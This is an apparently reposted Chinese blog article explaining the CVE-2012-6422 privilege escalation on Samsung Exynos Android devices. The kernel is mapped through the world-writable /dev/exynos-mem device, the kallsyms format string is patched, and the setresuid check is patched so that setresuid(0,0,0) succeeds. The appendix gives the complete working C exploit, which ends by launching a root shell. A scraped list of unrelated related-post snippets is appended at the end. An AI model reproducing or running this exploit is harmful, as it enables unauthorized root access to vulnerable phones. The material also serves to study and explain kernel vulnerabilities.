2. 程式人生 > >Android內核sys_setresuid() Patch提權(CVE-2012-6422)

Android內核sys_setresuid() Patch提權(CVE-2012-6422)

阿新 發佈:2018-10-28
uri side fgets http debugging and all def art

讓我們的Android ROOT,多一點套路。

一、簡單套路

CVE-2012-6422的漏洞利用代碼,展示了另一種提權方法。(見附錄)

這也是一個mmap驅動接口校驗導致映射任意內核地址的洞。將內核映射到用戶進程空間後,使用setresuid(0, 0, 0)進行提權。

其步驟如下:

  1. 利用漏洞,映射內核到調用者進程空間
  2. 搜索內核,查找“%pK %c %s\n”,並Patch成“%p %c %s\n”
  3. 搜索內核,查找sys_setresuid符號地址
  4. 搜索sys_setresuid代碼段,查找“0xe3500000” 並Patch為“0xe3500001”
  5. 用戶態調用setresuid()提權
  6. 將前面2處Patch恢復原貌

二、詳解

1)為什麽搜索“%pK %c %s\n”

我們獲得Linux的內核符號地址,一般首選讀取/proc/kallsyms,但由於kptr_restrict的引入(/proc/sys/kernel/kptr_restrict),讀到的內核符號地址一般是被抹掉的(0x00000000)。

查看內核實現,在執行$ cat /proc/kallsyms 時,對應內核代碼為s_show()函數:

527 static int s_show(struct seq_file *m, void *p)
528 {
529         struct kallsym_iter *iter = m->private;
530 
531         /* Some debugging symbols have no name.  Ignore them. */
532         if (!iter->name[0])
533                 return 0;
534 
535         if (iter->module_name[0]) {
536                 char type;
537 
538                 /*
539                  * Label it "global" if it is exported,
540                  * "local" if not exported.
541                  */
542                 type = iter->exported ? toupper(iter->type) :
543                                         tolower(iter->type);
544                 seq_printf(m, "%pK %c %s\t[%s]\n", (void *)iter->value,
545                            type, iter->name, iter->module_name);
546         } else
547                 seq_printf(m, "%pK %c %s\n", (void *)iter->value,
548                            iter->type, iter->name);
549         return 0;
550 }

我們在/proc/kallsyms中看到的3列值,是由下述代碼生成:


547                 seq_printf(m, "%pK %c %s\n", (void *)iter->value,
548                            iter->type, iter->name);

其中%pK格式符會根據kptr_restrict值,選擇是否顯示符號地址,默認kptr_restrict值一般為1,即隱藏符號地址。只需要將K替換為空格,即可繞過此限制。

2)為什麽要將sys_setresuid代碼的“0xe3500000” Patch為“0xe3500001”

我們知道,如果成功調用setresuid(0, 0, 0),則會獲得root權限,但成功執行此調用需要嚴格條件,具體描述下。

setresuid()被執行的條件有:

  1. 當前進程的euid是root

  2. 三個參數,每一個等於原來某個id中的一個

如果滿足以上條件的任意一個,setresuid()都可以正常調用並執行,將進程的ID設置成對應的ID。

但顯然,我們的提權程序不滿足上述任何一個條件,那怎麽辦呢。看代碼。

/*
 * This function implements a generic ability to update ruid, euid,
 * and suid.  This allows you to implement the 4.4 compatible seteuid().
 */
asmlinkage long sys_setresuid(uid_t ruid, uid_t euid, uid_t suid)
{
	int old_ruid = current->uid;
	int old_euid = current->euid;
	int old_suid = current->suid;
	int retval;

	retval = security_task_setuid(ruid, euid, suid, LSM_SETID_RES);
	if (retval)
		return retval;

	if (!capable(CAP_SETUID)) {
		if ((ruid != (uid_t) -1) && (ruid != current->uid) &&
		    (ruid != current->euid) && (ruid != current->suid))
			return -EPERM;
		if ((euid != (uid_t) -1) && (euid != current->uid) &&
		    (euid != current->euid) && (euid != current->suid))
			return -EPERM;
		if ((suid != (uid_t) -1) && (suid != current->uid) &&
		    (suid != current->euid) && (suid != current->suid))
			return -EPERM;
	}
	if (ruid != (uid_t) -1) {
		if (ruid != current->uid && set_user(ruid, euid != current->euid) < 0)
			return -EAGAIN;
	}
	if (euid != (uid_t) -1) {
		if (euid != current->euid)
		{
			current->mm->dumpable = 0;
			wmb();
		}
		current->euid = euid;
	}
	current->fsuid = current->euid;
	if (suid != (uid_t) -1)
		current->suid = suid;

	return security_task_post_setuid(old_ruid, old_euid, old_suid, LSM_SETID_RES);
}

sys_setresuid()的邏輯很簡單,首先調用 retval = security_task_setuid(ruid, euid, suid, LSM_SETID_RES); 設置實際用戶ID,有效用戶ID及保存的設置用戶ID,如果成功,直接返回retval。

setresuid()有個性質,英文名稱是all-or-nothing effect,意思是,如果setresuid()對某一個ID設置成功了,其他的失敗了,比如只改變了ruid,suid和euid都改失敗了,那麽程序會將ruid改回原來的值,即保證要麽三個ID都能成功修改,要麽三個都沒能修改成功。

我們只需要Patch掉下述代碼,使其返回成功。

if (retval)
	return retval;

而其對應的ARM匯編為:


cmp r0, #0


對應字節碼為 0xE3500000,只需將其Patch成cmp r0, #1即可,即0xE3500001,所有進程的setresuid(0, 0, 0)都將成功執行,將當前進程提升到root權限。

ARM Opcodes查詢可通過:http://armconverter.com

三、附錄:CVE-2012-6422 exploit

/*
 * exynos-mem device abuse by alephzain
 *
 * /dev/exynos-mem is present on GS3/GS2/GN2/MEIZU MX
 *
 * the device is R/W by all users :
 * crw-rw-rw-  1 system graphics  1, 14 Dec 13 20:24 /dev/exynos-mem
 *
 */

/*
 * Abuse it for root shell
 */
#include <stdio.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <sys/ioctl.h>
#include <stdbool.h>

#define PAGE_OFFSET 0xC0000000
#define PHYS_OFFSET 0x40000000

int main(int argc, char **argv, char **env) {
	int fd, i, m, index, result;

	unsigned long *paddr = NULL;
    unsigned long *tmp = NULL;
    unsigned long *restore_ptr_fmt = NULL;
    unsigned long *restore_ptr_setresuid = NULL;
    unsigned long addr_sym;

	int page_size = sysconf(_SC_PAGE_SIZE);
    int length = page_size * page_size;

    /* for root shell */
    char *cmd[2];
    cmd[0] = "/system/bin/sh";
    cmd[1] = NULL;

    /* /proc/kallsyms parsing */
    FILE *kallsyms = NULL;
    char line [512];
    char *ptr;
    char *str;

    bool found = false;

    /* open the door */
	fd = open("/dev/exynos-mem", O_RDWR);
	if (fd == -1) {
		printf("[!] Error opening /dev/exynos-mem\n");
		exit(1);
	}

    /* kernel reside at the start of physical memory, so take some Mb */
    paddr = (unsigned long *)mmap(NULL, length, PROT_READ|PROT_WRITE, MAP_SHARED, fd, PHYS_OFFSET);
    tmp = paddr;
    if (paddr == MAP_FAILED) {
        printf("[!] Error mmap: %s|%08X\n",strerror(errno), i);
        exit(1);
    }

    /*
     * search the format string "%pK %c %s\n" in memory
     * and replace "%pK" by "%p" to force display kernel
     * symbols pointer
     */
    for(m = 0; m < length; m += 4) {
        if(*(unsigned long *)tmp == 0x204b7025 
                    && *(unsigned long *)(tmp+1) == 0x25206325 
                    && *(unsigned long *)(tmp+2) == 0x00000a73 ) {
            printf("[*] s_show->seq_printf format string found at: 0x%08X\n", PAGE_OFFSET + m);
            restore_ptr_fmt = tmp;
            *(unsigned long*)tmp = 0x20207025;
            found = true;
            break;
        }
        tmp++;
    }

    if (found == false) {
        printf("[!] s_show->seq_printf format string not found\n");
        exit(1);
    }

    found = false;

    /* kallsyms now display symbols address */       
    kallsyms = fopen("/proc/kallsyms", "r");
    if (kallsyms == NULL) {
        printf("[!] kallsysms error: %s\n", strerror(errno));
        exit(1);
    }

    /* parse /proc/kallsyms to find sys_setresuid address */
    while((ptr = fgets(line, 512, kallsyms))) {
        str = strtok(ptr, " ");
        addr_sym = strtoul(str, NULL, 16);
        index = 1;
        while(str) {
            str = strtok(NULL, " ");
            index++;
            if (index == 3) {
                if (strncmp("sys_setresuid\n", str, 14) == 0) {
                    printf("[*] sys_setresuid found at 0x%08X\n",addr_sym);
                    found = true;
                }
                break;
            }
        }
        if (found) {
            tmp = paddr;
            tmp += (addr_sym - PAGE_OFFSET) >> 2;
            for(m = 0; m < 128; m += 4) {
                if (*(unsigned long *)tmp == 0xe3500000) {
                    printf("[*] patching sys_setresuid at 0x%08X\n",addr_sym+m);
                    restore_ptr_setresuid = tmp;
                    *(unsigned long *)tmp = 0xe3500001;
                    break;
                }
                tmp++;
            }
            break;
        }
    }

    fclose(kallsyms);

    /* to be sure memory is updated */
    usleep(100000);

    /* ask for root */
    result = setresuid(0, 0, 0);

    /* restore memory */
    *(unsigned long *)restore_ptr_fmt = 0x204b7025;
    *(unsigned long *)restore_ptr_setresuid = 0xe3500000;
    munmap(paddr, length);
    close(fd);

    if (result) {
        printf("[!] set user root failed: %s\n", strerror(errno));
        exit(1);
    }

    /* execute a root shell */
    execve (cmd[0], cmd, env);

    return 0;
}

Android內核sys_setresuid() Patch提權(CVE-2012-6422)

相關推薦

Androidsys_setresuid() PatchCVE-2012-6422

uri side fgets http debugging and all def art 讓我們的Android ROOT,多一點套路。 一、簡單套路 CVE-2012-6422的漏洞利用代碼,展示了另一種提權方法。(見附錄) 這也是一個mmap驅動接口校驗導致映射任意內

Ubuntu本地CVE-2017-16995復現

面向新手,大佬勿噴 漏洞概述 2018-03-16有網友釋出訊息:ubuntu 最新版本(Ubuntu 16.04)存在高危的本地提權漏洞,漏洞編號為CVE-2017-16995。該漏洞存在於呼叫eBPF bpf(2)的Linux核心系統中,當用戶提供惡意BPF程式使eBPF驗證器模組產生計算錯誤,導致任

android_rooting_tools 項目介紹CVE-2012-4220

mem targe 項目介紹 UNC () put_user lba hack diag android_rooting_tools是GITHUB上的一個Android內核漏洞提權項目,包含多套內核漏洞的exploit代碼: EXPLOITCVE簡單描述 libd

Microsoft XML Core Services緩衝區溢位漏洞CVE-2012-1889漏洞分析報告

軟體名稱: Microsoft XML Core Services 軟體版本:XML 3.0/4.0/5.0/6.0 漏洞模組:msxml3.dll. 實驗系統:windows xp sp3 漏洞影響系統:windows XP/7/8/8.1 漏洞編號:CVE-2012

Android應用程式讀取/dev下裝置而

//分別遍歷/sys/class /sys/block /sys/devices device_init() { coldboot(fd,"/sys/class"); coldboot(fd,"/sys/block"); coldboot(fd,"/sys/devices"); } //後

Android三大核心功能之一AMS內部原理

tasks tro com one 分析 itl dac chmod 重要 上面類是AmS的全稱,另外兩大核心功能是WindowManagerService.java和View.java AmS提供的主要功能: 統一調度各應用程序 內存管理 進程管理 AmS中定

Android剖析.pdf:

設計公司 管理系統 播放 ctf 文件系統 frame 聯想 .com 電子 下載地址:網盤下載 由柯元旦編著的《Android內核剖析》詳細分析了Android內核的內部機制,包括窗口管理系統、Activity管理系統、輸入法框架、編譯系統等,為Android內核定制及高

Android漏洞利用技術實戰:環境搭建&棧溢出實戰

fin vmlinux ant eas turn git static gin qemu 前言 Android的內核采用的是 Linux 內核,所以在Android內核中進行漏洞利用其實和在 一般的 x86平臺下的 linux 內核中進行利用差不多。主要區別在於 Andro

linux調度算法2--CPU時間片如何分配

slice 算法 用戶輸入 at命令 用戶 以及 等待 結構 計算 內核在微觀上,把CPU的運行時間分成許多分,然後安排給各個進程輪流運行,造成宏觀上所有的進程仿佛同時在執行。雙核CPU,實際上最多只能有兩個進程在同時運行,大家在top、vmstat命令裏看到的正在運行的進

【轉載】linux調度算法3--多系統的負載均衡

調度 -- 頻繁 target tel 內核調度 intel 當前 .cn 多核CPU現在很常見,那麽問題來了,一個程序在運行時,只在一個CPU核上運行?還是交替在多個CPU核上運行呢?LINUX內核是如何在多核間調度進程的呢?又是內核又是CPU核,兩個核有點繞,下面稱CP

linux調度算法1--快速找到最高優先級進程

保持 active fin long 開始 維護 運行 nice 好的 為什麽要了解內核的調度策略呢?呵呵,因為它值得我們學習,不算是廢話吧。內核調度程序很先進很強大,管理你的LINUX上跑的大量的亂七八糟的進程,同時還保持著對用戶操作的高靈敏響應,如果可能,為什麽不把這種

Android Studio配置和使用OpenCV3.x不依靠Manager

我所使用的opencv版本為3.1,Android Studio版本為2.0 先從opencv官網下載對應的版本的安卓的opencv的sdk 解壓出來路徑不要有中文 然後在Android Studio裡建立一個安卓專案,在根目錄建立一個資料夾,命名為libr

ADB配置漏洞CVE-2017-13212原理與利用分析

adb由於擁有shell許可權,因此僅在授權PC端後才可使用shell許可權,而通過該漏洞,可以實現在移動端獲取shell許可權,以致於可隨意刪除應用、螢幕截圖等等高許可權操作。不過移動端惡意應用程式必須能夠連線到adbd正在監聽的TCP埠,這就需要應用程式

CVE-2016-1240Tomcat本地漏洞分析與復現

前言       Tomcat是個執行在Apache上的應用伺服器,支援執行Servlet/JSP應用程式的容器——可以將Tomcat看作是Apache的擴充套件,實際上Tomcat也可以獨立於Apache執行。        Tomcat於2016年10月1日曝出本地提權漏

Android模仿iOS實現側滑返回類似微信

actionbar fin kth ins any lean blog 模仿 over 我們都知道側滑返回操作是 iOS 裏面比較常見的功能,一般是手指在靠近手機屏幕左邊緣向右滑動就可以關閉當前的界面,iOS 系統提供了這樣的 API,但是 Android 怎麽實現呢? 網

Android開發——打造簡單的Viewpager指示器小圓點指示器

ges 其它 tar contex 但是 state 定義 效果 布局 準備工作: 1.兩張不同顏色的小圓點圖片,可以去阿裏巴巴矢量圖網站搜索 我把我使用的圖片貼出來 2.一個簡單的Viewpager的實現 下面是簡單的Viewpager實現步驟:

Android SDK Manager和AVD Manager使用win7_64bit下測試

參數 osi 軟件開發 ostc 安裝包 下載 項目構建工具 sys android開發 http://www.cnblogs.com/kangjianwei101/p/5621238.html#m4 Android SDK Manager和AVD Man

Android驅動中的remap_pfn_range()校驗漏洞CVE-2013-2596

用戶態 bsp 介紹 進程 sig shared res exploit 關系 簡單介紹 當然類似函數還有io_remap_pfn_range()。 remap_pfn_range() 為用戶態提供了一種手段訪問內核地址空間。它通過新頁表,將一塊內核物理內存映射到用戶態進程

Android Java層UI渲染實現一Context的建立

在Android應用程式的四大元件中,只有Activity元件與UI相關,它描述的是應用程式視窗,因此我們通過它的UI實現來分析Android系統在Java層的UI實現。 首先,我們得從Activity的啟動開始: 再我們呼叫startActivity後,最終會呼叫startAc

Android工程架構設計:Base Library基層MVP框架基於EventBus

Base Library部分把App中Application,UI(activity,fragment)公用方法重新封裝成模板方法,並開放對子類的擴充套件。同時融入mvp設計思想,封裝成基於mvp的基層架構體系。 目錄 1,IApplication(介面): 2,BaseAp